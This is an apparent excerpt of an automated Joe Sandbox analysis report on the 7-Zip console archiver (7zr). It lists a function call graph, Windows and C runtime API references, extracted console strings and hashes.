2 API calls 74287->74288 74289 a9ad5f 74288->74289 74290 a62e04 2 API calls 74289->74290 74291 a9a5d8 74290->74291 74291->73509 74292->73517 74293->73518 74294->73518 74296 a7425a __EH_prolog 74295->74296 74297 a62e04 2 API calls 74296->74297 74298 a742c4 74297->74298 74299 a62e04 2 API calls 74298->74299 74300 a742d0 74299->74300 74514 a7440b 74300->74514 74314 a82c2e 74313->74314 74315 a82c35 74313->74315 74316 a61e0c ctype 2 API calls 74314->74316 74315->73602 74316->74315 74318 a747ee 74317->74318 74319 a747f4 74317->74319 74525 a61e40 free 74318->74525 74319->73602 74322 a96092 74321->74322 74323 a9612c 74322->74323 74526 a95d3c 74322->74526 74323->73602 74334 a82b13 __EH_prolog 74333->74334 74335 a62e04 2 API calls 
74334->74335 74341 a831e2 __EH_prolog 74339->74341 74340 a83234 74340->73602 74341->74340 74342 a61e0c ctype 2 API calls 74341->74342 74343 a83216 74342->74343 74343->74340 74346 a82a82 74345->74346 74347 a62e04 2 API calls 74346->74347 74348 a82a9f 74347->74348 74348->73602 74350 a96363 __EH_prolog 74349->74350 74351 a9637f 74350->74351 74352 a9c7d7 ctype 6 API calls 74350->74352 74566 a95a4d 74351->74566 74352->74351 74393 a82ce5 __EH_prolog 74392->74393 74394 a62f1c 2 API calls 74393->74394 74479 a82bbf __EH_prolog 74478->74479 75697 a8d24e 74479->75697 74490->73544 74491->73545 74492->73550 74493->73554 74494->73559 74495->73560 74496->73602 74497->73602 74498->73602 74499->73602 74500->73552 74501->73577 74503->73583 74505->73601 74507->73610 74509->73565 74512->73556 74513->73560 74515 a74415 __EH_prolog 74514->74515 74525->74319 75698 a8d259 75697->75698 75730->73675 75731->73671 75732 a67b20 75735 a67ab2 75732->75735 75736 a67ac5 75735->75736 75743 a6759a 75736->75743 75739 a67b03 75757 a67919 75739->75757 75740 a67aeb SetFileTime 75740->75739 75744 a675a4 __EH_prolog 75743->75744 75745 a6764c CloseHandle 75744->75745 75747 a675af 75745->75747 75746 a67632 75746->75739 75746->75740 75747->75746 75748 a675d4 CreateFileW 75747->75748 75749 a675e9 75747->75749 75748->75749 75749->75746 75750 a62e04 2 API calls 75749->75750 75751 a675fb 75750->75751 75752 a68b4a 9 API calls 75751->75752 75753 a67611 75752->75753 75754 a67615 CreateFileW 75753->75754 75755 a6762a 75753->75755 75754->75755 75773 a61e40 free 75755->75773 75758 a67aac 75757->75758 75759 a6793c 75757->75759 75759->75758 75760 a67945 DeviceIoControl 75759->75760 75761 a679e6 75760->75761 75762 a67969 75760->75762 75763 a679ef DeviceIoControl 75761->75763 75766 a67a14 75761->75766 75762->75761 75768 a679a7 75762->75768 75764 a67a22 DeviceIoControl 75763->75764 75763->75766 75765 a67a44 DeviceIoControl 75764->75765 75764->75766 75765->75766 75766->75758 75775 a6780d 8 API calls ctype 75766->75775 75774 
a69252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 75768->75774 75769 a67aa5 75771 a677de 5 API calls 75769->75771 75771->75758 75772 a679d0 75772->75761 75773->75746 75774->75772 75775->75769 75776 ae6ba3 VirtualFree 75777 aabf67 75778 aabf85 75777->75778 75779 aabf74 75777->75779 75779->75778 75783 aabf8c 75779->75783 75784 aabf96 __EH_prolog 75783->75784 75800 aad144 75784->75800 75788 aabfd0 75807 a61e40 free 75788->75807 75790 aabfdb 75808 a61e40 free 75790->75808 75792 aabfe6 75809 aac072 free ctype 75792->75809 75794 aabff4 75810 a7aafa free VariantClear ctype 75794->75810 75796 aac023 75811 a873d2 free VariantClear __EH_prolog ctype 75796->75811 75798 aabf7f 75799 a61e40 free 75798->75799 75799->75778 75802 aad14e __EH_prolog 75800->75802 75812 aad1b7 75802->75812 75805 aabfc5 75806 a61e40 free 75805->75806 75806->75788 75807->75790 75808->75792 75809->75794 75810->75796 75811->75798 75820 aad23c 75812->75820 75814 aad1ed 75827 a61e40 free 75814->75827 75816 aad209 75828 a61e40 free 75816->75828 75818 aad180 75819 aa8e04 memset 75818->75819 75819->75805 75829 aad2b8 75820->75829 75823 aad25e 75846 a61e40 free 75823->75846 75826 aad275 75826->75814 75827->75816 75828->75818 75848 a61e40 free 75829->75848 75831 aad2c8 75849 a61e40 free 75831->75849 75833 aad2dc 75850 a61e40 free 75833->75850 75835 aad2e7 75851 a61e40 free 75835->75851 75837 aad2f2 75852 a61e40 free 75837->75852 75839 aad2fd 75853 a61e40 free 75839->75853 75841 aad308 75854 a61e40 free 75841->75854 75843 aad313 75844 aad246 75843->75844 75855 a61e40 free 75843->75855 75844->75823 75847 a61e40 free 75844->75847 75846->75826 75847->75823 75848->75831 75849->75833 75850->75835 75851->75837 75852->75839 75853->75841 75854->75843 75855->75844 75856 a9c2e6 75857 a9c52f 75856->75857 75860 a9544f SetConsoleCtrlHandler 75857->75860 75859 a9c53b 75860->75859 75861 af7da0 WaitForSingleObject 75862 af7dbb GetLastError 75861->75862 75863 af7dc1 75861->75863 75862->75863 75864 af7dce CloseHandle 
75863->75864 75865 af7ddf 75863->75865 75864->75865 75866 af7dd9 GetLastError 75864->75866 75866->75865 75867 a71368 75869 a7136d 75867->75869 75870 a7138c 75869->75870 75873 af7d80 WaitForSingleObject 75869->75873 75876 a9f745 75869->75876 75880 af7ea0 SetEvent GetLastError 75869->75880 75874 af7d8e GetLastError 75873->75874 75875 af7d98 75873->75875 75874->75875 75875->75869 75877 a9f74f __EH_prolog 75876->75877 75881 a9f784 75877->75881 75879 a9f765 75879->75869 75880->75869 75882 a9f78e __EH_prolog 75881->75882 75883 a712d4 4 API calls 75882->75883 75884 a9f7c7 75883->75884 75885 a712d4 4 API calls 75884->75885 75886 a9f7d4 75885->75886 75887 a9f871 75886->75887 75890 ae6b23 VirtualAlloc 75886->75890 75891 a6c4d6 75886->75891 75887->75879 75890->75887 75895 a6c4e9 75891->75895 75892 a6c6f3 75892->75887 75895->75892 75896 a6c695 memmove 75895->75896 75897 a7111c 75895->75897 75902 a711b4 75895->75902 75896->75895 75898 a71130 75897->75898 75899 a7115f 75898->75899 75907 a6b668 75898->75907 75926 a6d331 75898->75926 75899->75895 75903 a711c1 75902->75903 75904 a711eb 75903->75904 75938 aaae7c 75903->75938 75943 aaaf27 75903->75943 75904->75895 75919 a6b675 75907->75919 75908 a6b864 75930 a67b7c 75908->75930 75911 a6b8aa GetLastError 75912 a6b6aa 75911->75912 75912->75898 75913 a6b81b 75913->75912 75916 a6b839 memcpy 75913->75916 75914 a67731 5 API calls 75914->75919 75915 a6b7e7 75915->75908 75918 a67731 5 API calls 75915->75918 75916->75912 75917 a6b811 75936 a6b8ec GetLastError 75917->75936 75921 a6b80d 75918->75921 75919->75908 75919->75912 75919->75913 75919->75914 75919->75915 75919->75917 75920 a6b7ad 75919->75920 75935 a67b4f ReadFile 75919->75935 75920->75919 75925 a6b8c7 75920->75925 75934 ae6a20 VirtualAlloc 75920->75934 75921->75908 75921->75917 75925->75912 75928 a6d355 75926->75928 75927 a6d374 75927->75898 75928->75927 75929 a6b668 10 API calls 75928->75929 75929->75927 75931 a67b89 75930->75931 75937 a67b4f ReadFile 75931->75937 75933 a67b9a 
[Execution graph residue: a call-graph edge list of function addresses (node ids and hex offsets) with no readable structure. Only the API node labels are recoverable; the Windows/CRT APIs that appear in this portion of the graph are: VariantClear, SetFileSecurityW, SetFileTime, WriteFile, CloseHandle, GetLastError, CharUpperW, GetStdHandle, GetConsoleScreenBufferInfo, SysAllocStringLen, SysStringLen, SetEvent, GetModuleHandleA, GetProcAddress, GetCurrentProcess, GetProcessAffinityMask, GetSystemInfo, GlobalMemoryStatusEx, GlobalMemoryStatus, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, VirtualFree, and CRT routines (malloc, free, memcpy, memmove, memset, strlen, wcscmp, fputc, fputs, exit, _CxxThrowException, _controlfp, _initterm, __getmainargs, __p___initenv, __setusermatherr, _XcptFilter, __aulldiv, __EH_prolog, ctype).]
                                APIs
                                • __EH_prolog.LIBCMT ref: 00AA81F1
                                  • Part of subcall function 00AAF749: _CxxThrowException.MSVCRT(?,00B14A58), ref: 00AAF792
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: ExceptionH_prologThrow
                                • String ID:
                                • API String ID: 461045715-3916222277
                                • Opcode ID: 780e4b4f9745bb2a360b9dd324478abf053616f7cf6d6d9abc720731976a627f
                                • Instruction ID: 9f32a575b4e339d92471a3a12d9848df306adabc9759c9b6ccb9013e3ba2b5a4
                                • Opcode Fuzzy Hash: 780e4b4f9745bb2a360b9dd324478abf053616f7cf6d6d9abc720731976a627f
                                • Instruction Fuzzy Hash: 2B92A030A00249DFDF15DFA8C944BEEBBB1BF1A304F244099E815AB292DB79DD45CB61
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A6686D
                                  • Part of subcall function 00A66848: FindClose.KERNELBASE(00000000,?,00A66880), ref: 00A66853
                                • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00A668A5
                                • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00A668DE
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: Find$FileFirst$CloseH_prolog
                                • String ID:
                                • API String ID: 3371352514-0
                                • Opcode ID: 0c2193f8516dd1f87f5a56470c314890b5bb3eb572b640e529a2ca9b20112560
                                • Instruction ID: 787e08e67e1930d95b84f78b3d31732fa4c2ff9972076e4be5eb978173b70551
                                • Opcode Fuzzy Hash: 0c2193f8516dd1f87f5a56470c314890b5bb3eb572b640e529a2ca9b20112560
                                • Instruction Fuzzy Hash: 28118B31500209ABCB10AFB4D951AEDBBB9EF64364F204669E9A1571D1DB328E86DB80

                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$ExceptionThrow
                                • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                                • API String ID: 3665150552-429544124
                                • Opcode ID: cdfb5dbec980322a42aa451cbfc1a4811da00d31fe9fcaa8c578f16b7b0df93d
                                • Instruction ID: 30061f467748cdcf6553f16a01a6956591f08064614a30e4ef6f473d0102baf4
                                • Opcode Fuzzy Hash: cdfb5dbec980322a42aa451cbfc1a4811da00d31fe9fcaa8c578f16b7b0df93d
                                • Instruction Fuzzy Hash: EC529A30E00258DFCF26EBA4CA95BEDBBF5AF54304F14409AE04AA7291DB706E84CF51

                                APIs
                                • fputs.MSVCRT(Scanning the drive for archives:), ref: 00A9A43E
                                  • Part of subcall function 00A61FA0: fputc.MSVCRT ref: 00A61FA7
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputcfputs
                                • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                                • API String ID: 269475090-3104439828
                                • Opcode ID: f0f392ba5fa8c1e1da0e1f6df8bb4ee80c60bcf071878c639aa531728645fdbd
                                • Instruction ID: e1e8c4e21786baff250819ebf047e9f8b88d0f17e613cf1cc026561bf6b1c5c4
                                • Opcode Fuzzy Hash: f0f392ba5fa8c1e1da0e1f6df8bb4ee80c60bcf071878c639aa531728645fdbd
                                • Instruction Fuzzy Hash: 6C227A30A00258DFDF26EBA4C956BEDBBF1AF54300F14409AE45AA72A1DB716E84CF51

                                APIs
                                • __EH_prolog.LIBCMT ref: 00A98017
                                • fputs.MSVCRT ref: 00A9804D
                                  • Part of subcall function 00A98341: __EH_prolog.LIBCMT ref: 00A98346
                                  • Part of subcall function 00A98341: fputs.MSVCRT ref: 00A9835B
                                  • Part of subcall function 00A98341: fputs.MSVCRT ref: 00A98364
                                • fputs.MSVCRT ref: 00A9807A
                                  • Part of subcall function 00A61FA0: fputc.MSVCRT ref: 00A61FA7
                                  • Part of subcall function 00A6965D: VariantClear.OLEAUT32(?), ref: 00A6967F
                                • SysFreeString.OLEAUT32(00000000), ref: 00A981AA
                                • fputs.MSVCRT ref: 00A981CD
                                • SysFreeString.OLEAUT32(00000000), ref: 00A98267
                                • SysFreeString.OLEAUT32(00000000), ref: 00A982B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                • API String ID: 2889736305-3797937567
                                • Opcode ID: a0a1fe48ea64e18edb15aa6173d3c45b7d86200e0b124798785e8dbeba9105c4
                                • Instruction ID: 1fc17fb8081c6f38f6666651146bde53280e82a4e9a54e7ff96c598c0c778923
                                • Opcode Fuzzy Hash: a0a1fe48ea64e18edb15aa6173d3c45b7d86200e0b124798785e8dbeba9105c4
                                • Instruction Fuzzy Hash: B5916431B00609EFDF14DFA4CA85AEEBBF5FF59310F204129E512AB291DB74A905CB60

                                APIs
                                • __EH_prolog.LIBCMT ref: 00A9676B
                                • EnterCriticalSection.KERNEL32(00B22938), ref: 00A96781
                                • fputs.MSVCRT ref: 00A9680B
                                • LeaveCriticalSection.KERNEL32(00B22938), ref: 00A96944
                                  • Part of subcall function 00A9C7D7: fputs.MSVCRT ref: 00A9C840
                                • fputs.MSVCRT ref: 00A96851
                                  • Part of subcall function 00A62201: fputs.MSVCRT ref: 00A6221E
                                • fputs.MSVCRT ref: 00A968D9
                                • fputs.MSVCRT ref: 00A968F6
                                  • Part of subcall function 00A61FA0: fputc.MSVCRT ref: 00A61FA7
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                • String ID: v$Sub items Errors:
                                • API String ID: 2670240366-2468115448
                                • Opcode ID: 7cf3176608b0585afebb08163bccccb0e719b2ade65197ec37fa31cd3fe063d5
                                • Instruction ID: 2ec4383755bd66278e57a62799fc7e8e29026e8375533a59cc15ecbff50a60da
                                • Opcode Fuzzy Hash: 7cf3176608b0585afebb08163bccccb0e719b2ade65197ec37fa31cd3fe063d5
                                • Instruction Fuzzy Hash: 7B519D32605A00DFCB259FA4D994AEABBF2FF84310F54896EE19B87261DB307C44CB50

                                APIs
                                • __EH_prolog.LIBCMT ref: 00A9635E
                                • fputs.MSVCRT ref: 00A9645F
                                  • Part of subcall function 00A9C7D7: fputs.MSVCRT ref: 00A9C840
                                • fputs.MSVCRT ref: 00A96547
                                • fputs.MSVCRT ref: 00A9665F
                                • fputs.MSVCRT ref: 00A966AE
                                  • Part of subcall function 00A61F91: fflush.MSVCRT ref: 00A61F93
                                  • Part of subcall function 00A61FB3: __EH_prolog.LIBCMT ref: 00A61FB8
                                  • Part of subcall function 00A61E40: free.MSVCRT ref: 00A61E44
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$H_prolog$fflushfree
                                • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                • API String ID: 1750297421-1898165966
                                • Opcode ID: 19c95da60c37792d8bd6b1d7c7bf5f40180d8865368e5098317f055cc17c30cf
                                • Instruction ID: 0932eff016d475f9af72f97cf5019f66789386120b906e75bf9e96569b791df0
                                • Opcode Fuzzy Hash: 19c95da60c37792d8bd6b1d7c7bf5f40180d8865368e5098317f055cc17c30cf
                                • Instruction Fuzzy Hash: F0B128307017059FDF28EF64CAA1BAABBF1FF44304F04892EE55A97692CB74A944CB51

                                Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A66C77
                                • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00A66EC9
                                  • Part of subcall function 00A66C72: wcscmp.MSVCRT ref: 00A670A5
                                  • Part of subcall function 00A66BF5: __EH_prolog.LIBCMT ref: 00A66BFA
                                  • Part of subcall function 00A66BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00A66C1A
                                  • Part of subcall function 00A66BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00A66C49
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                • String ID: :$DATA
                                • API String ID: 3316598575-2587938151
                                • Opcode ID: 09f21cdf90a084faba479488135298a54ee5b312e1371b48412174f5606e51f3
                                • Instruction ID: df667d6d0a3f06afc70f6873fbc6f25903fbcd7db4bfd6fddd4ad7d7e69b35ba
                                • Opcode Fuzzy Hash: 09f21cdf90a084faba479488135298a54ee5b312e1371b48412174f5606e51f3
                                • Instruction Fuzzy Hash: 74E12530900609DECF21EFA4C991BEEBBB1BF15318F10821DE8526B2E1DB75A949CB51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$H_prolog
                                • String ID: =
                                • API String ID: 2614055831-2525689732
                                • Opcode ID: 6d659d736f09d0c5304ec9c804aaf253130dbe56f2cdba2f350d06e6a7a9a15a
                                • Instruction ID: 82ca9a99453ce24f8cfc6c945ca8ada1ec273f936063ad563cdcbb48cbe3523d
                                • Opcode Fuzzy Hash: 6d659d736f09d0c5304ec9c804aaf253130dbe56f2cdba2f350d06e6a7a9a15a
                                • Instruction Fuzzy Hash: D9215C32A04118EFCF09EB94DA52BEEBBB5EF58310F24006AE401721A1DF766E55CB91
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A98346
                                • fputs.MSVCRT ref: 00A9835B
                                • fputs.MSVCRT ref: 00A98364
                                  • Part of subcall function 00A983BF: __EH_prolog.LIBCMT ref: 00A983C4
                                  • Part of subcall function 00A983BF: fputs.MSVCRT ref: 00A98401
                                  • Part of subcall function 00A983BF: fputs.MSVCRT ref: 00A98437
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs$H_prolog
                                • String ID: =
                                • API String ID: 2614055831-2525689732
                                • Opcode ID: e91631760b63fe87cb0a92894bdd0865e3f6e96598887d7cd98dbd2953e17c33
                                • Instruction ID: c53745b0eb37cd6c83044e5d92db6b50e910ca8214c02f0ca9f46e3c3f4abf35
                                • Opcode Fuzzy Hash: e91631760b63fe87cb0a92894bdd0865e3f6e96598887d7cd98dbd2953e17c33
                                • Instruction Fuzzy Hash: 27016232A00008ABCF15BBA4D952AEEBFB5EF84750F00401AF401962A1CF795A55DB91
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A8209B
                                  • Part of subcall function 00A6757D: GetLastError.KERNEL32(00A6D14C), ref: 00A6757D
                                  • Part of subcall function 00A82C6C: __EH_prolog.LIBCMT ref: 00A82C71
                                  • Part of subcall function 00A61E40: free.MSVCRT ref: 00A61E44
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$ErrorLastfree
                                • String ID: Cannot find archive file$The item is a directory
                                • API String ID: 683690243-1569138187
                                • Opcode ID: 5cd85b97c69025b982680bcd3f5adc6ebfe6d8c0a486049b304c9f9c9a84532b
                                • Instruction ID: 4ae2c08220c158e25b7bf8d35b04f3041f8faa97b30e56ac8b6c16cca07ed622
                                • Opcode Fuzzy Hash: 5cd85b97c69025b982680bcd3f5adc6ebfe6d8c0a486049b304c9f9c9a84532b
                                • Instruction Fuzzy Hash: 4B723674D00258DFCB25EFA8C984BEDBBB5BF59300F24809AE859A7252D7709E81CF51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: CountTickfputs
                                • String ID: .
                                • API String ID: 290905099-4150638102
                                • Opcode ID: ece1d9a8a3410feca01d218dd5912cae55a28a102dc12d317b7a4c0190da2210
                                • Instruction ID: de41c95942fe65fbe4d31d171c314d55668808c6f9a008df19aee34bed4919df
                                • Opcode Fuzzy Hash: ece1d9a8a3410feca01d218dd5912cae55a28a102dc12d317b7a4c0190da2210
                                • Instruction Fuzzy Hash: 90712430700B049FDF21EF68CA91BAAB7F6AF81724F50481DE09797A81DB70B949CB11
                                APIs
                                  • Part of subcall function 00A69C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00A69CB3
                                  • Part of subcall function 00A69C8F: GetProcAddress.KERNEL32(00000000), ref: 00A69CBA
                                  • Part of subcall function 00A69C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00A69CC8
                                • __aulldiv.LIBCMT ref: 00AA093F
                                • __aulldiv.LIBCMT ref: 00AA094B
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                • String ID: 3333
                                • API String ID: 3520896023-2924271548
                                • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                • Instruction ID: bf50a46f88a032f347df41ab7e00b09350594d8a0de4bd95cd8140e217e1a12d
                                • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                • Instruction Fuzzy Hash: 3A2186B19007086EE7309FAA8981A6BFBFDEF85750F00892EB186D3741D670A9448B65
                                APIs
                                  • Part of subcall function 00A61E40: free.MSVCRT ref: 00A61E44
                                • memset.MSVCRT ref: 00A8AEBA
                                • memset.MSVCRT ref: 00A8AECD
                                  • Part of subcall function 00AA04D2: _CxxThrowException.MSVCRT(?,00B14A58), ref: 00AA04F8
                                Strings
                                Memory Dump Source
